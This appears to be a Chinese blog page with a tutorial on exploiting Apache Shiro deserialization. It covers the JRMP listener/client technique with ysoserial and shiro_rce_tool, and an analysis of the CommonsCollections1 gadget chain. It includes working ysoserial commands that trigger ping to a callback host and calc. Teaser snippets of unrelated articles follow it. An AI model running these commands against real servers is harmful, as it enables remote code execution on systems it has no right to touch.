news 2026/4/24 9:55:50

JAVA攻防-Shiro专题有key无利用链JRMP协议CC1链分析Transform执行链

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
JAVA攻防-Shiro专题有key无利用链JRMP协议CC1链分析Transform执行链

知识点:
1、Java攻防-Shiro-有key无利用链&JRMP协议
2、Java攻防-Shiro-CC1链分析&Transform执行链

一、演示案例-Java攻防-Shiro-有key无利用链&JRMP协议

Shriokey无链:
JRMP指的是Java远程方法协议(Java Remote Method Protocol)。它是Java对象实现远程通信的基础技术,也是Java RMIRemote Method Invocation,远程方法调用)的底层通信协议。借助JRMP,运行于某个Java虚拟机(JVM)中的对象能够调用另一个JVM中对象的方法,就如同调用本地对象的方法一样便捷。

非常规链:
利用工具:https://github.com/wyzxxz/shiro_rce_tool
文章:https://mp.weixin.qq.com/s/MdCUfyaUCAa2M3P3H1NsGw

公网靶场-URLDNS链

1、ysoserial生成JRMPListener

java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener6789CommonsCollections5"ping kfxmlanpak.zaza.eu.org"


shiro_tool使用JRMPClient模式


2、java-chains项目生成JRMPListener





shiro_tool使用JRMPClient模式

本地DEMO-执行RCE



1、ysoserial生成JRMPListener

java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener6789CommonsCollections5"calc"


shiro_tool使用JRMPClient模式

2、java-chains项目生成JRMPListener




shiro_tool使用JRMPClient模式

二、演示案例-Java攻防-Shiro-CC1链分析&Transform执行链

文章参考:https://mp.weixin.qq.com/s/J_YeNkLN6KYTCVDYFh1dvQ

commons-collections Gadget chain: ObjectInputStream.readObject()AnnotationInvocationHandler.readObject())MapEntry#setValueTransformedMap#checkSetValueChainedTransformer.transform()ConstantTransformer.transform()Runtime.class InvokerTransformer.transform()getRuntime().exec("calc");Class.getMethod()Runtime.getRuntime()Runtime.exec()//跟链过程从下往上,源码全局搜索InvokerTransformer.transform()

1、寻找sink执行点

作用:执行点触发RCE执行

InvokerTransformer#transform()




本地DEMO





ChainedTransformer#transform()

ConstantTransformer#transform()

2、寻找gadget调用链

作用:调用链实现承上启下

TransformedMap#checkSetValue

现在已经知道RCE的由来,现在只需要看谁用了transform()




MapEntry#setValue







3、寻找Source入口点

作用:入口点重写方法调用

AnnotationInvocationHandler#readObject()#setValue


ObjectInputStream#readObject()

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/24 9:55:42

从需求分析到精准匹配:解码专业红娘的“择偶系统设计”逻辑

作为一名长期与逻辑和系统打交道的技术人,你是否发现:调试代码比处理情感问题简单得多?今天我们从系统设计的角度,聊聊专业红娘如何帮你解决这个“非线性优化问题”。一、问题定义:为什么择偶需求比产品需求更难厘清&a…

作者头像 李华
网站建设 2026/4/22 14:04:37

从抽检到全检,AI 正在如何改变工厂质量控制体系?

在相当长的一段时间里,抽检一直是制造业中被广泛采用、也被证明有效的质量控制方式。它成立的前提在于:质量风险可以通过概率模型被有效覆盖。但随着工厂规模扩大、产品型号增多、生产节拍加快,质量管理所面临的现实条件正在发生变化。当批次…

作者头像 李华
网站建设 2026/4/18 12:20:22

蓝牙学习之Provision(7)bind (1)

在 Bluetooth Mesh 网络中,设备完成 Provisioning(配网) 后,虽然已分配了 地址(Unicast Address) 和 网络密钥(NetKey),但此时它还不能接收任何应用层命令(如…

作者头像 李华
网站建设 2026/4/23 12:28:02

nRF54LM20B 芯片相关技术: Nordic端到端边缘AI方案

目录 概述 1 边缘AI介绍 2 核心硬件配置 3 Axon NPU 4 AI性能与能效亮点 5 主要应用方向 概述 Nordic Semiconductor新推出的nRF54LM20B是一款专为电池供电物联网设备设计的、集成神经网络处理器(NPU)的超低功耗无线系统级芯片(SoC&…

作者头像 李华
网站建设 2026/4/18 9:06:25

【C语言图形学】用*号绘制完美圆的三种算法详解与实现【AI】

前言 在控制台中使用字符绘制图形是学习计算机图形学和算法设计的绝佳入门方式。今天,我们将深入探讨如何在C语言中使用*号绘制一个完美的圆。这不仅是一个有趣的编程练习,更是理解计算机图形学基础算法的好机会。 一、绘制圆的挑战 在开始之前&#xff…

作者头像 李华
网站建设 2026/4/21 4:10:33

真正的风险在于工作流安全而非模型安全

随着AI副驾驶和智能助手被嵌入到日常工作中,安全团队仍然专注于保护模型本身。但最近的事件表明,更大的风险在别处:围绕这些模型的工作流程。最近发现两个伪装成AI助手的Chrome扩展程序从90多万用户那里窃取了ChatGPT和DeepSeek的聊天数据。另…

作者头像 李华